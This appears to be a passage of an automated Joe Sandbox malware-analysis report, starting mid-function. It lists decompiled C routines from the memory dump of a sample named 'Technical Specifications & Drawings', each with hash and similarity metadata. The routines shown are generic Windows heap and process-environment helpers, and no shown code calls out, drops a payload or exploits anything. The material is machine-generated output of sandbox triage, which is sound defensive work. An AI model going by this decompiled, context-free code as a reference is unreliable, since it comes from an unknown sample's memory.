                                                  						L9:
                                                  						return 0;
                                                  					}
                                                  					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                                  					if(__eflags != 0) {
                                                  						goto L9;
                                                  					}
                                                  					goto L8;
                                                  				}
                                                  				_t18 = __ecx + 0x30;
                                                  				if(E017CC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x1781030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                  					goto L6;
                                                  				} else {
                                                  					return 1;
                                                  				}
                                                  			}










                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d152edd70c11b13f41114d44a18f66bd784cf3742b353962b641d143fd264f0d
                                                  • Instruction ID: b6476f2d80d2a9b3373cb4652938f3aafd7d07c37505d15df1d1e0f408243d04
                                                  • Opcode Fuzzy Hash: d152edd70c11b13f41114d44a18f66bd784cf3742b353962b641d143fd264f0d
                                                  • Instruction Fuzzy Hash: 87F0BE32526E888FD7B3DB5CCA64B22B7D8AF007B8F545574E405C79A2C724EA40C740
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E017DA44B(signed int __ecx) {
                                                  				intOrPtr _t13;
                                                  				signed int _t15;
                                                  				signed int* _t16;
                                                  				signed int* _t17;
                                                  
                                                  				_t13 =  *0x1897b9c; // 0x0
                                                  				_t15 = __ecx;
                                                  				_t16 = L017C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
                                                  				if(_t16 == 0) {
                                                  					return 0;
                                                  				}
                                                  				 *_t16 = _t15;
                                                  				_t17 =  &(_t16[2]);
                                                  				E017EFA60(_t17, 0, _t15 << 2);
                                                  				return _t17;
                                                  			}








                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4be9a5462ad67150e2754001359a86f23ec250765e9d43eb950148fc4b71a887
                                                  • Instruction ID: 1e0a57038f09d8d737dbd4abb09aac35efd4b203a08a431fb57d6801d340e833
                                                  • Opcode Fuzzy Hash: 4be9a5462ad67150e2754001359a86f23ec250765e9d43eb950148fc4b71a887
                                                  • Instruction Fuzzy Hash: 73E09272A01421ABD2215A18EC04F66B3ADEBE5A51F0A4039E605D7218D628DE01C7E0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 79%
                                                  			E017AF358(void* __ecx, signed int __edx) {
                                                  				char _v8;
                                                  				signed int _t9;
                                                  				void* _t20;
                                                  
                                                  				_push(__ecx);
                                                  				_t9 = 2;
                                                  				_t20 = 0;
                                                  				if(E017DF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
                                                  					_t20 = L017C4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                                  				}
                                                  				return _t20;
                                                  			}







                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                  • Instruction ID: 26cca80a1dddb980a303be3ae2565f68afe38ba24989d14ebec5231296a7b27a
                                                  • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                  • Instruction Fuzzy Hash: CDE0D832A40118FBDB3196D99D05F5AFFBCDB94B61F050195FA04D7150D5609D00D2D0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E017BFF60(intOrPtr _a4) {
                                                  				void* __ecx;
                                                  				void* __ebp;
                                                  				void* _t13;
                                                  				intOrPtr _t14;
                                                  				void* _t15;
                                                  				void* _t16;
                                                  				void* _t17;
                                                  
                                                  				_t14 = _a4;
                                                  				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x17811a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                  					return E018788F5(_t13, _t14, _t15, _t16, _t17, __eflags);
                                                  				} else {
                                                  					return E017C0050(_t14);
                                                  				}
                                                  			}











                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a59b1f1191e640d79d0b83f49bf95551500ec43530bffd033a6211a078973cde
                                                  • Instruction ID: 9dd16da5d28b3899e034e88d9f787a6799799138cd8b77aeb3388e61c445f750
                                                  • Opcode Fuzzy Hash: a59b1f1191e640d79d0b83f49bf95551500ec43530bffd033a6211a078973cde
                                                  • Instruction Fuzzy Hash: 91E0DFB0609204DFD735DB5AD8C4FA5FB98DB52F21F1AC05DE0088B102C721D881C28A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 82%
                                                  			E018341E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                  				void* _t5;
                                                  				void* _t14;
                                                  
                                                  				_push(8);
                                                  				_push(0x18808f0);
                                                  				_t5 = E017FD08C(__ebx, __edi, __esi);
                                                  				if( *0x18987ec == 0) {
                                                  					E017BEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                  					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
                                                  					if( *0x18987ec == 0) {
                                                  						 *0x18987f0 = 0x18987ec;
                                                  						 *0x18987ec = 0x18987ec;
                                                  						 *0x18987e8 = 0x18987e4;
                                                  						 *0x18987e4 = 0x18987e4;
                                                  					}
                                                  					 *(_t14 - 4) = 0xfffffffe;
                                                  					_t5 = L01834248();
                                                  				}
                                                  				return E017FD0D1(_t5);
                                                  			}






                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ec1fc38ab11a4d7b8de3e41b0f20fd0fd04af57d14dba870c99f5bdcedcc691e
                                                  • Instruction ID: 456dd0ff66ea21d7ec8e4cf768a57666162a69942f782a30251aa396258cfb67
                                                  • Opcode Fuzzy Hash: ec1fc38ab11a4d7b8de3e41b0f20fd0fd04af57d14dba870c99f5bdcedcc691e
                                                  • Instruction Fuzzy Hash: 97F0157482070AEFDBB0EFA9D50471C76A4F797310F08411A9204D73AAC73447A4CF41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0185D380(void* __ecx, void* __edx, intOrPtr _a4) {
                                                  				void* _t5;
                                                  
                                                  				if(_a4 != 0) {
                                                  					_t5 = L017AE8B0(__ecx, _a4, 0xfff);
                                                  					L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                                  					return _t5;
                                                  				}
                                                  				return 0xc000000d;
                                                  			}





                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                  • Instruction ID: 62717de8a49beda92b326f351f51cdb7988633b13f86d543c4adb74bab62b8a5
                                                  • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                  • Instruction Fuzzy Hash: 39E0C231280209BBEB225E84CC04FA9BB16DB50BA0F104035FE089A691CA71DD91DAC4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E017DA185() {
                                                  				void* __ecx;
                                                  				intOrPtr* _t5;
                                                  
                                                  				if( *0x18967e4 >= 0xa) {
                                                  					if(_t5 < 0x1896800 || _t5 >= 0x1896900) {
                                                  						return L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
                                                  					} else {
                                                  						goto L1;
                                                  					}
                                                  				} else {
                                                  					L1:
                                                  					return E017C0010(0x18967e0, _t5);
                                                  				}
                                                  			}






                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c297163c6e54778ba739f6954f653c032354df86d1b1ffd21184e3af01ffd320
                                                  • Instruction ID: 8d5eaf99dee60ef40f596fdcc3d33a9a9ccdb24af240728deec4303a2c155617
                                                  • Opcode Fuzzy Hash: c297163c6e54778ba739f6954f653c032354df86d1b1ffd21184e3af01ffd320
                                                  • Instruction Fuzzy Hash: 72D02B7112000466CB2E13208918B257632F780B90F3C040CF3078B5A5FD50C9D89108
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E017D16E0(void* __edx, void* __eflags) {
                                                  				void* __ecx;
                                                  				void* _t3;
                                                  
                                                  				_t3 = E017D1710(0x18967e0);
                                                  				if(_t3 == 0) {
                                                  					_t6 =  *[fs:0x30];
                                                  					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
                                                  						goto L1;
                                                  					} else {
                                                  						return L017C4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
                                                  					}
                                                  				} else {
                                                  					L1:
                                                  					return _t3;
                                                  				}
                                                  			}






                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5281b3ca040314207750c07514bd2ac9a725e3ec0a46cace369f47abdb63771f
                                                  • Instruction ID: 15d97fcf6c487d6eaf52f5d199de79aa8d4861f5f4dfeb2326dc17ed50af5d13
                                                  • Opcode Fuzzy Hash: 5281b3ca040314207750c07514bd2ac9a725e3ec0a46cace369f47abdb63771f
                                                  • Instruction Fuzzy Hash: 4BD0A771100101A2EE2D5B149818B146671EB90B91F78005CF307594D0DFA0CD92E058
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E018253CA(void* __ebx) {
                                                  				intOrPtr _t7;
                                                  				void* _t13;
                                                  				void* _t14;
                                                  				intOrPtr _t15;
                                                  				void* _t16;
                                                  
                                                  				_t13 = __ebx;
                                                  				if( *((char*)(_t16 - 0x65)) != 0) {
                                                  					E017BEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                  					_t7 =  *((intOrPtr*)(_t16 - 0x64));
                                                  					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
                                                  				}
                                                  				if(_t15 != 0) {
                                                  					L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
                                                  					return  *((intOrPtr*)(_t16 - 0x64));
                                                  				}
                                                  				return _t7;
                                                  			}









                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                  • Instruction ID: 5b37c0c132277ce7404189d8a71e7aa281aebc2818eff13f5306321d05dcd0af
                                                  • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                  • Instruction Fuzzy Hash: 46E08C319406849BCF13DB4CC698F8EBBF5FB45B00F140018A0089B660CA24EE00CB00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E017BAAB0() {
                                                  				intOrPtr* _t4;
                                                  
                                                  				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                  				if(_t4 != 0) {
                                                  					if( *_t4 == 0) {
                                                  						goto L1;
                                                  					} else {
                                                  						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
                                                  					}
                                                  				} else {
                                                  					L1:
                                                  					return 0x7ffe0030;
                                                  				}
                                                  			}





                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                  • Instruction ID: 77bcff9ba47aa39a238c19410225a9e1235395cadb5e25ce8381d90db413fca1
                                                  • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                  • Instruction Fuzzy Hash: 3ED0E939352E80CFD65BDB1DC995B5577A4BB44B44FC50490E501CB762E72CDA44CA10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E017D35A1(void* __eax, void* __ebx, void* __ecx) {
                                                  				void* _t6;
                                                  				void* _t10;
                                                  				void* _t11;
                                                  
                                                  				_t10 = __ecx;
                                                  				_t6 = __eax;
                                                  				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
                                                  					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
                                                  				}
                                                  				if( *((char*)(_t11 - 0x1a)) != 0) {
                                                  					return E017BEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                  				}
                                                  				return _t6;
                                                  			}







                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                  • Instruction ID: e957c45cadbd279c83b399fdf2bec5c4b3530351e0af9d061682aa6713c70971
                                                  • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                  • Instruction Fuzzy Hash: A3D0A77140118999DB01AF34C1187A8FF71BB00204FF810A5800705556C3354909C602
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E017ADB40() {
                                                  				signed int* _t3;
                                                  				void* _t5;
                                                  
                                                  				_t3 = L017C4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
                                                  				if(_t3 == 0) {
                                                  					return 0;
                                                  				} else {
                                                  					 *_t3 =  *_t3 | 0x00000400;
                                                  					return _t3;
                                                  				}
                                                  			}






                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                  • Instruction ID: cfabe858ea50d9a2ba0886de043d4dff5a8c640b730d9e6a182158a844ca0a6d
                                                  • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                  • Instruction Fuzzy Hash: D7C08C30280A01AAEB321F20CD01B00BAA0BB50F01F8400A46302EA4F4DB78DC01E600
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0182A537(intOrPtr _a4, intOrPtr _a8) {
                                                  
                                                  				return L017C8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
                                                  			}



                                                  0x0182a553

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                  • Instruction ID: bfe3bf4ea64da32b18be4abbd9d707ef8e4bbdef4fdd75fceae83eda1a158a04
                                                  • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                  • Instruction Fuzzy Hash: 38C08C33080248BBCB126F81CC00F06BF2AFBA8B60F008018FA080B571C632E970EB84
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E017C3A1C(intOrPtr _a4) {
                                                  				void* _t5;
                                                  
                                                  				return L017C4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                                  			}




                                                  0x017c3a35

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                  • Instruction ID: 392c09497660d3872487e655a05f05380ac8614e2c8ce572bf648c43721a4c45
                                                  • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                  • Instruction Fuzzy Hash: DBC08C32080248BBC7226E41DC00F01BB29E7A0B60F000024B6040A5608532EC60D588
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E017AAD30(intOrPtr _a4) {
                                                  
                                                  				return L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                                  			}



                                                  0x017aad49

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                  • Instruction ID: 3d99a1e52f6aeb91fad4f4f1581d94c96a6f594c3b7695a0b383364043bb927a
                                                  • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                  • Instruction Fuzzy Hash: 28C08C32080248BBC7126A45CD04F01BB29E7A0B60F000024B6040A6618932E860D988
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E017B76E2(void* __ecx) {
                                                  				void* _t5;
                                                  
                                                  				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
                                                  					return L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                                                  				}
                                                  				return _t5;
                                                  			}





                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                  • Instruction ID: 0141ad9b126373acd7e2c9eb5146359efb69b041d6db10e769cb5318306f59fa
                                                  • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                  • Instruction Fuzzy Hash: 68C08C701411C45AEB2E570CCE68B20BA50AB48B0CF48019CAA010D4E2C368EC02D608
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E017D36CC(void* __ecx) {
                                                  
                                                  				if(__ecx > 0x7fffffff) {
                                                  					return 0;
                                                  				} else {
                                                  					return L017C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                                                  				}
                                                  			}




                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                  • Instruction ID: abfc8ab58e734cdc2c6f3b04fce50f2a970f702bea00281a59edf2136fd27567
                                                  • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                  • Instruction Fuzzy Hash: F2C02BB0150440FBD7251F30CD10F14F274F700F21F64035C7321554F4D5299C00D101
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E017C7D50() {
                                                  				intOrPtr* _t3;
                                                  
                                                  				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                  				if(_t3 != 0) {
                                                  					return  *_t3;
                                                  				} else {
                                                  					return _t3;
                                                  				}
                                                  			}





                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E017D2ACB() {
                                                  				void* _t5;
                                                  
                                                  				return E017BEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                  			}





                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 69d0c8ab054ab38440f77d718712560ed335a6e1d2aec744933abcaf946810c1
                                                  • Instruction ID: 0823b7eca6434c8c3dfbc3626bad841f70dad5e71421e9d3224f18c3f5cfde0b
                                                  • Opcode Fuzzy Hash: 69d0c8ab054ab38440f77d718712560ed335a6e1d2aec744933abcaf946810c1
                                                  • Instruction Fuzzy Hash: 1E90027120904846D15071998404B474015A7D4345F52C025A10546A4DD6658D55F6A2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
